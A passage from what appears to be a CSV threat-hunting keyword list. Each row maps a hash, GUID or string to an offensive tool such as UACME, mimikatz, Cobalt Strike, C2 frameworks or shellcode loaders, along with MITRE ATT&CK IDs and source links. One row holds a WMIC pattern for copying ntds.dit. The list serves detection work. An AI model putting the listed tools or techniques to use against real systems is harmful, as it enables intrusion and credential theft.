TA0006,N/A,N/A,Discovery,https://github.com/nheiniger/SnaffPoint,1,0,N/A,7,2,191,19,2022-11-04T13:26:24Z,2022-08-25T13:16:06Z -*87a210d7a7ed8cd635437bfe6d79bd9ee9ca8d6ef9079f9b30b4162e3843ad37*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*881D4D67-46DD-4F40-A813-C9D3C8BE0965*,offensive_tool_keyword,KRBUACBypass,UAC Bypass By Abusing Kerberos Tickets,T1548.002 - T1558 - T1558.003,TA0004 - TA0006,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/KRBUACBypass,1,0,N/A,8,5,402,52,2023-08-10T02:51:59Z,2023-07-27T12:08:12Z -*881D4D67-46DD-4F40-A813-C9D3C8BE0965*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,0,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z -*893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*894a784e-e04c-483c-a762-b6c03e744d0b*,offensive_tool_keyword,SharpToken,SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them,T1134 - T1101 - T1214 - T1087 - T1038,TA0004 - TA0007,N/A,N/A,Exploitation tools,https://github.com/BeichenDream/SharpToken,1,1,N/A,N/A,4,353,47,2023-04-11T13:29:23Z,2022-06-30T07:34:57Z -*8ac147d1db55cbfaaa3a7cd3c7ae1da147c9add049e8150dab26609a22a53a10*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*8d41849fa260b5a4a6a05db8312b60b3f6f2b5efe4f4d4fdd05c70701c7aabed*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*8f25cacb678c008ff3f205dc9d66f4411902b867df8656ea758c0c6d2141e18f*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*90F6244A-5EEE-4A7A-8C75-FA6A52DF34D3*,offensive_tool_keyword,SharpLDAP,tool written in C# that aims to do enumeration via LDAP queries,T1018 - T1069.003,TA0007 - TA0011,N/A,N/A,Discovery,https://github.com/mertdas/SharpLDAP,1,0,N/A,8,1,50,7,2023-01-14T21:52:36Z,2022-11-16T00:38:43Z -*912bbb35787c58046da31f1608d07a68753fa4bd8782e29ef80eb51e65e887d2*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*913d774e5cf0bfad4adfa900997f7a1a*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*913d774e5cf0bfad4adfa900997f7a1a*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*91EA50CD-E8DF-4EDF-A765-75354643BD0D*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*9209af6bfe87a818df00297bed5517be70c1d931523b71e25813365699df749a*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*928097a924168caad66fead2633e4d44e4f585e0d33d05deb50b9c2d34cda246*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*9434096968402430d1ace03ffbb13ba28c2e4fcb23e59ed353eac70aa02b5b25*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*946D24E4-201B-4D51-AF9A-3190266E0E1B*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,0,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z -*969b35213fa23ff50a169e5498a97f28bc6f5820b447b78ec9dc6910dd8cc3e8*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*97e0720ed22d2d99e8148aab7ab2cb2cc3df278225669828b2d8d4d9ef856d94*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*9877129f209f0c3faf146ab725442b614c49942b7b888e3aabf5903217cb0503*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*99$1a7F1qr2HihoXfs/56u5XMdpDZ83N6hW/HI=*,offensive_tool_keyword,ShuckNT,ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES),T1552.001 - T1555.003 - T1078.003,TA0006 - TA0002 - TA0040,N/A,N/A,Credential Access,https://github.com/yanncam/ShuckNT,1,1,N/A,10,1,36,4,2023-02-02T10:40:59Z,2023-01-27T07:52:47Z -*99e3e313b62bb8b55e2637fc14a78adb6f33632a3c722486416252e2630cfdf6*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*99E40E7F-00A4-4FB1-9441-B05A56C47C08*,offensive_tool_keyword,openbullet,The OpenBullet web testing application.,T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001,TA0005 - TA0001,N/A,N/A,Web Attacks,https://github.com/openbullet/openbullet,1,0,N/A,10,10,1342,714,2023-02-24T16:29:01Z,2019-03-26T09:06:32Z -*9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*9AA32BBF-90F3-4CE6-B210-CBCDB85052B0*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*9AC25A8825407CCB6089BC7A2DF530D1830795B7E71A981ECEE4C5F48387B37A*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45*,offensive_tool_keyword,rpivot,socks4 reverse proxy for penetration testing,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/klsecservices/rpivot,1,0,N/A,10,10,490,125,2018-07-12T09:53:13Z,2016-09-07T17:25:57Z -*9b9dad8b40daf87f796c91a0538198921acebd13d47515e0e27b18eaad6906f4*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*9bd3b7a206ced26ce5e03a4002bbd41e4f57b8c8c9ce4467f54221ad68e55a58*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*9c0087f31cd45fe4bfa0ca79b51df2c69d67c44f2fbb2223d7cf9ab8d971c360*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*9c71ab720c5589739b70ecd7f5bae0bb6ab2ac043bac1a24aec50864f3037719*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*9cbedf9b92abaef3ea28de28dd523ac44079592178ef727c7003c339a5a54712*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*9ccf0c8c7eef918c9dd7b89dd94f0dfa7dc8779b1f9e862908b09b47b75f7d1f*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*9D1B853E-58F1-4BA5-AEFC-5C221CA30E48*,offensive_tool_keyword,SharPersist,SharPersist Windows persistence toolkit written in C#.,T1547 - T1053 - T1027 - T1028 - T1112,TA0003 - TA0008,N/A,N/A,Persistence,https://github.com/fireeye/SharPersist,1,0,N/A,10,10,1150,233,2023-08-11T00:52:09Z,2019-06-21T13:32:14Z -*9D365106-D7B8-4B5E-82CC-6D6ABCDCA2B8*,offensive_tool_keyword,NTDLLReflection,Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table,T1055.012 - T1574.002 - T1027.001 - T1218.011,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/NTDLLReflection,1,0,N/A,9,3,278,42,2023-08-02T02:21:43Z,2023-02-03T17:12:33Z -*9E357027-8AA6-4376-8146-F5AF610E14BB*,offensive_tool_keyword,SharpSword,Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly,T1562.004 - T1059.001 - T1021.003,TA0005 - TA0002,N/A,N/A,C2,https://github.com/OG-Sadpanda/SharpSword,1,0,N/A,8,10,110,13,2023-08-22T20:16:28Z,2021-07-15T14:50:05Z -*9e3f1386bfb64dbaa3cbb12fd3bf51c734872c2fdf15cf1aaeca52a515767519*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*9emin1/charlotte*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,1,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -*A La Vie* A L'Amour*,offensive_tool_keyword,mimikatz,mimikatz default strings,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*a0rtega/metame*,offensive_tool_keyword,metame,metame is a metamorphic code engine for arbitrary executables,T1027 - T1059.003 - T1140,TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/a0rtega/metame,1,1,N/A,N/A,6,508,96,2019-10-06T18:24:14Z,2016-08-07T13:56:57Z -*A17656B2-42D1-42CD-B76D-9B60F637BCB5*,offensive_tool_keyword,PowerShx,Run Powershell without software restrictions.,T1059.001 - T1055.001 - T1055.012,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/iomoath/PowerShx,1,0,N/A,7,3,267,46,2021-09-08T03:44:10Z,2021-09-06T18:32:45Z -*A38C04C7-B172-4897-8471-E3478903035E*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*A38C04C7-B172-4897-8471-E3478903035E*,offensive_tool_keyword,DiskCryptor,DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions,T1486 ,TA0040,N/A,N/A,Ransomware,https://github.com/DavidXanatos/DiskCryptor,1,0,N/A,10,4,361,96,2023-08-13T11:20:25Z,2019-04-20T14:51:18Z -*a3bc28e48c61afe31a0c986674ac145e773d616b2fafb49a090d50cc26ea4479*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*A3h1nt/gimmeSH*,offensive_tool_keyword,gimmeSH,gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.,T1059 T1505,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/A3h1nt/gimmeSH,1,1,N/A,N/A,2,168,27,2021-08-27T03:12:15Z,2021-08-02T07:22:15Z -*a6730ebb3e91961283f7a1cd95ace2a6d0d55e50531a64e57b03e61a8cf2d0e7*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*a7469955bff5e489d2270d9b389064e1*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,0,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*a78983b009b688a82458abac952516db57dc7eb3118a35cc737dde29c7b87ec4*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*A7AD39B5-9BA1-48A9-B928-CA25FDD8F31F*,offensive_tool_keyword,regreeper,gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.,T1050.005 - T1012 - T1112 - T1553.002 - T1053.005,TA0005 - TA0003 - TA0007,N/A,N/A,Defense Evasion - Persistence,https://github.com/tccontre/Reg-Restore-Persistence-Mole,1,0,N/A,10,1,46,15,2023-08-23T11:34:26Z,2023-08-03T14:47:45Z -*A8FE1F5C-6B2A-4417-907F-4F6EDE9C15A3*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*aa3939fc357723135870d5036b12a67097b03309*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.exe*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,0,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*AAABAAMAEBAAAAEAIABoBAAANgAAACAgAAABACAAKBEAAJ4EAAAwMAAAAQAgAGgmAADGFQAAKAAAABAAAAAgAAAAAQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP39*,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,0,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*AAB4D641-C310-4572-A9C2-6D12593AB28E*,offensive_tool_keyword,SharpEfsPotato,Local privilege escalation from SeImpersonatePrivilege using EfsRpc.,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/bugch3ck/SharpEfsPotato,1,0,N/A,10,3,241,40,2022-10-17T12:35:06Z,2022-10-17T12:20:47Z -*aakchaleigkohafkfjfjbblobjifikek*,greyware_tool_keyword,ProxFlow,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*AAP-AddToHighPrivilegePrincipalMap*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*AAP-CheckIfMemberOfPrivilegedDirectoryRole*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*AAP-DisplayApplicableMFAConditionalAccessPolicyForUserID*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*AAP-DisplayHighPrivilegePrincipalMap*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*AAP-DisplayNonHighPrivilegedRoleAssignments*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*AAP-GetHighPrivilegedDirectoryRoleTemplateMap*,offensive_tool_keyword,Azure-AccessPermissions,Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/csandker/Azure-AccessPermissions,1,0,N/A,6,1,90,16,2023-02-21T06:46:24Z,2022-10-19T10:33:24Z -*abopscript.txt*,offensive_tool_keyword,EQGR,Equation Group scripts and tools,T1213.001 - T1203.001,TA0001 - TA0003,N/A,N/A,Exploitation tools,https://fdik.org/EQGRP/Linux/doc/old/etc/abopscript.txt,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*aboul3la*,offensive_tool_keyword,Github Username,Github username of pentester known for enumeration tools,N/A,N/A,N/A,N/A,Information Gathering,https://github.com/aboul3la,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*AbuseGithubAPI*.cpp*,offensive_tool_keyword,GithubC2,Github as C2,T1095 - T1071.001,TA0011,N/A,N/A,C2,https://github.com/TheD1rkMtr/GithubC2,1,0,N/A,10,10,115,29,2023-08-02T02:26:05Z,2023-02-15T00:50:59Z -*AbuseGithubAPI*.exe*,offensive_tool_keyword,GithubC2,Github as C2,T1095 - T1071.001,TA0011,N/A,N/A,C2,https://github.com/TheD1rkMtr/GithubC2,1,0,N/A,10,10,115,29,2023-08-02T02:26:05Z,2023-02-15T00:50:59Z -*ac i ntds*\\127.0.0.1\ADMIN$\*,greyware_tool_keyword,wmic,The actor has executed WMIC commands [T1047] to create a copy of the ntds.dit file and SYSTEM registry hive using ntdsutil.exe,T1047 - T1005 - T1567.001,TA0002 - TA0003 - TA0007,N/A,Volt Typhoon,Credential Access,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ACBypassTest*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform 